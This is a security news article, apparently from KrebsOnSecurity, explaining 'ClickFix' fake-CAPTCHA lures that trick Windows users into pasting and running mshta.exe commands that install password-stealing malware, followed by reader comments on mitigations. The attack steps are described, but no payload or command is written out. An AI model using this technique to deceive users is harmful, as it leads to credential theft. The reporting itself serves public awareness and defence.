A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.
ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:
This malware attack pretends to be a CAPTCHA intended to separate humans from bots.
Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.
Executing this series of keypresses prompts Windows to download password-stealing malware.
Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.
Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.
Step 3 — pressing the “Enter” key — causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.
“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”
According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.
In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.
Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.
An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.
ClickFix tactic used by malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. Source: Sekoia.
The ClickFix attack — and its reliance on mshta.exe — is reminiscent of phishing techniques employed for years that hid exploits inside Microsoft Office macros. Malicious macros became such a common malware threat that Microsoft was forced to start blocking macros by default in Office documents that try to download content from the web.
Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.
HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). Image: Proofpoint.
Organizations that wish to do so can take advantage of Microsoft Group Policy restrictions to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.
I know every change breaks someone’s workflow, but I don’t see any compelling reason why the Run menu needs to accept pasted text.
Oooh boy you would break my life if you removed paste from Run. I live in the Run window. Sometimes I use it to very quickly and efficiently remove formatting from copied text (win+r -> ctrl+v-> ctrl+a -> ctrl+x -> esc). Sometimes i use it to open copied links quickly (they open in the default browser). Sometimes I use it to compose an email to a copied email address (win+r -> type “mailto:” -> ctrl+v). The list goes on.
Ooooh boy you would break my life if you removed paste from Run. I live in the Run window. Sometimes I use it to very quickly and efficiently remove formatting from copied text (win+r -> ctrl+v-> ctrl+a -> ctrl+x -> esc). Sometimes i use it to open copied links quickly (they open in the default browser). Sometimes I use it to compose an email to a copied email address (win+r -> type “mailto:” -> ctrl+v). The list goes on.
well, it would be kinda nice if it were possible to restrict copy-paste to purely local operation. Apparently in the attack, the clipboard has been filled remotely. I am wondering if there is any legitimate use for that?
It’s most commonly used for copying/pasting “shareURLs” to a specific page, but there are other uses. It’s mainly a convenience as it’s one click as opposed to click, drag, ctrl-c. You used to be able to read the clipboard from browsers, too… they shut that down after crypto became a thing as scripts would try to steal passphrases.
That would be a big pain to not accept pasted text. But what would be good is for Microsoft to add a Registry Key or a Policy that would allow one to disable the ability. What would really be good is if Microsoft simple created a clipboard control panel that allowed one to set stuff like that as well as allow application specific paste options like stripping out formatting. But given a lot of Windows issues, one wonders if everyone at Microsoft on Windows development are Mac users.
Encountered this same malware just about a month ago.
It was invoking powershell script on a remote website.
More here: https://www.virustotal.com/gui/url/6212e7c9fa1e1a324005b20aa866041480fca97473c3dd1c5622af3781dedcc5?nocache=1
Only 10 of 96 security vendors show this as malware. But fairly certain they do not show everything they can detect on VT, not only in the short term but in the medium and long term as bad guys can also screen their latest malware there.
“as bad guys can also screen their latest malware there”
No, bad/good guys DO NOT screen their malware on VT. They have their own private VT which does not share samples with researchers and others.
Thank you Brian, perfect timing. Doing an anti-fraud presentation at a church on Sunday and will provide this info., to include your website.
I disable the Windows key, because the damn thing kept interrupting my games.
Also, I make it a rule never to use the browser that came with the operating system. No matter their assurances, it’s bound to get privileges a browser shouldn’t have.
if I own a computer I ought to be able to run things on it easily so I want win r. how did websites get access to put things on my clipboard, thus being one step closer to owning my machine?
That’s actually what the first button click is for: it’s the required user interaction before a website may write something to your clipboard.
But to answer your question:
According to the compatibility table at https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API, websites have been write text to clipboard on click since 2018.
But IIRC that feature was introduced to mimic identical functionality in Adobe Flash Player, so the real answer is: a really long time
Hackers usually always gain access through social engineering, then the fun stuff begins.
Victim gets phishing email. They fall for the scam and click on some link in that email. This downloads the C2 malware, to be activated by the next 3 steps.
Victim runs the 3 commands as instructed.
Voila!
C2 access.
Hackers usually always gain access through social engineering, then the fun stuff begins.
Victim gets phishing email. They fall for the scam and click on some link in that email. This downloads the C2 malware, to be activated by the next 3 steps.
Victim runs the 3 commands as instructed.
Voila!
C2 access.
sfgate.com/tech/article/sf-tech-company-spy-hid-in-bathroom-rival-alleges-20226709.php
And other fun stuff.
Clipboard access is not something only Edge has, so it’s nothing that’s solved by “not using the browser that came with the operating system”…
But out of curiosity, which browser do you use?
im coming right 4 u – Cheshire
serves booking.com right for how they rip off consumers
Very use-full. Info like this makes it worth putting up with your politics.
Useful is one word. I can understand why you’ve never used it.
+1
And it only has one “el”: useful.
Knowing it’s possible you’re a Russian troll, I just want to take a perfunctory jab: Russia legalized spousal abuse in 2017 because they claimed battered women were breaking up families with laws against abuse; plus, Russia is currently imprisoning Jehovah’s Witness members (some for 12 to 18 years). Their government is dominated by lower-human drives, emphasizing chimp-like brute force over reason — you know, like some other governments.
Russia changed spousal abuse from a felony to a misdemeanor in 2017, making it like a parking ticket with a tiny fine for the first year and escalating fines. And so much for Russia being “Christian,” because if you’re religious there but not with the Russian Orthodox church, you’re going to be have bad time if you’re public about your religion.
Should I assume Apple does not have this problem?
As far as I know, the shortest way to get from zero to shell prompt on a default Mac is: Command-Spacebar, T, E, Enter. The first one opens Spotlight, T and E are the first two characters of Terminal.app. After that the paste command (Command-V in this case) followed by Enter works the same.
It is visually different, though; Windows-R brings up the Run dialog, whereas what I described above launches the Terminal, so it’s a bit more apparent that you’re now using a different application.
I once received an email with some subject line that told me it was from Microsoft and urgent to read and then the message in the email was well written with grownup words and correct grammar. The message in the email told me to “click on this link to fix the problem.” DUH.
The link I clicked on instantly downloaded and installed a virus that destroyed the contents of my hard drive. As a computer professional with advanced skills and education, I felt like a moron afterward. I’ll never forget my father shaking his head and repeatedly telling me “You? I cannot believe that someone like you would have done this!” I ended up having to pay a colleague with a better tech background than me to restore my hard drive and operating system.
Bad actors only need to succeed once. Mistakes happen to all of us at some point or another, glad you were able to recover your data.
Brian, we believe that an employee was presented with this via a vendor site. it appears the vendor site was modified due to an outdated WordPress plugin/vulnerability. There seems to be a lot of this exploit currently on SMB sites built on WordPress.
lol, my kbd doesn’t have a Windows key 🙂
They will have OSx/Linux versions when you reach market parity in a few centuries.
Enjoy your spyware on windows!
I used OpenBSD for all my servers and SuSE Linux for my workstations almost exclusively.
On my OpenBSD machines, I set /tmp up with a ram disk. OpenBSD itself really doesn’t use much memory so there is plenty available for other things.
The other day, I tried an experiment. I created a test account for myself on one minor server. For this discussion, assume that the username is hans. I then created a hans directory in /tmp, changed the permission, and then copied all the files from the account I set up to the /tmp/hans directory:
mkdir /tmp/hans
cp -R /home/hans/* /tmp/hans
chown -R hans:hans /tmp/hans
chmod 700 /tmp/hans
I also set these same commands into /etc/rc.conf.local so that whenever the system reboots, it sets it all back up again.
And voila, I have an account on that is “reset to factory defaults” every time the computer restarts. It’s not an important server (a backup DHCP server) so I can restart it whenever I wish. Or I could just rm -fR /tmp/hans and then do the steps above again.
To be honest, it doesn’t really affect me much. It’s not bad for writing code. I just check out the code with subversion and rebuild it. And it’s no problem to set up crontab to use rsync to copy everything to a regular drive every little while so I wouldn’t lose too much if there was a power glitch.
I don’t know that this buys me anything, but it does insure that anythig malicious disappears when rebooted.
When I get a chance, I’ll try this out on my SuSE Linux workstaton, too.
By all means, try everything, that’s how you learn. But everything you have achieved here is a backup of your home in /tmp, which you don’t seem to use, and lose on a reboot or poweroff. I can’t see how that helps you with anything. The only thing in that setup preventing you from the exploit being subject here is that you’re using Linux. You should take some time to read of virtual machines, immutable filesystems, filesystem overlays, snapshots, usb live systems and all the things already existing which *can* do what you *seem* to want to do, only much much better. For starters, you may want to look at live Linuxes like Puppy Linux or Knoppix.
I have a number of servers for various things. I just tried that as a whim. I’m not sure that I’ll ever need it for anything.
Immutable Filesystems: My laptop is running Fedora Silverblue. It doesn’t get used a whole lot, though.
Also, I used to regularly set the system immutable bits on most file system files on my OpenBSD servers. The only problem was that to apply patches and upgrades, I would first have to drop it down to single user mode to clear the system immutable bits.
I have also used the Qubes OS in the past and have done a limited amount of virtual machines. And I have booted from CDs, DVDs, and USB devices on occasion. Over the years, I’ve u tried something like ten or fifteen different LINUXes, but SuSE Linux has remained my favorite Linux. I’ve also used OpenBSD on my workstation and didn’t use Linux at all.
I’ve also used FreeBSD, NetBSD, and Solaris.
I tried putting a user on /tmp on nothing more than a whim during a brief break in a coding binge. I can see one possible advantage, though — unless something has changed, the solid state drives tend to be far more limited in the number of writes than are the conventional hard drives. To help extend the lives of my solid state drives, I rely on ram drives, If I can put some of my heaviest applications on a randisk, that could possibly extend the solid state disk life by large multiples. For the most part, though, it is sufficient to just store individual files on the /tmp ram drive.
It takes an awful lot of writes to expend a newer SSD completely. I wouldn’t worry too much.
Yeah, but if you have a very heavily used database with lots of write, you might do it in a year or so.
But that’s a server. Redundancy.
Amost everything I do is on one server or another. In fact, I’m posting this from a server.
I don’t understand the sentiment around removing copy paste functionality. If not the run box, they’ll use cmd, powershell, whatever. Education is key.
next step would be to remove internet functionality from the computers, because it’s used for malwares
This has now become mainstream “down under” and the sophistication of the malware is evolving as well.
I assume this scam would fail if the user was using an account without admin rights and therefore unable to run the program. Could anyone confirm ? Thanks.
The malware fetched by completing the captcha will run in the context of the user; it doesn’t matter whether the user is admin or not because it can still snarf that user’s credentials.
have to be mainstream down under
It can be done in 3 steps and in 10 minutes
Speaking of hacks, the oldest one I know of was patchedz but nevwr fixed, many years ago. I don’t care how secure and encrypted a computer is. With physical access to remove shielding and a static shock or twoz almost any computer can be immediately jumped into a random place with access.
Quisiera comprender mejor esto. Puedes compartir mejor tu idea
¡Me reí demasiado con este comentario!
Use a Chromebook. Problem solved.
Use a Chromebook. Click wherever. Problem solved.
Mi first tought has been “come on! who would fall for that??”
But then my mind ran through all the IT uneducated people I met in my IT career of over 40 years and found lots of people that would…
It’s an abomination ANY website can read from or write to your clipboard.
I don’t understand how the JavaScript folks or web browser vendors didn’t see that as a trap ripe to set!
Was is somehow shoved into an RFC by committee?
Thanks Brian, Very Informative article. I dont sign in with admin rights. Is there anything that can be done to prevent the malicious pgm from being run?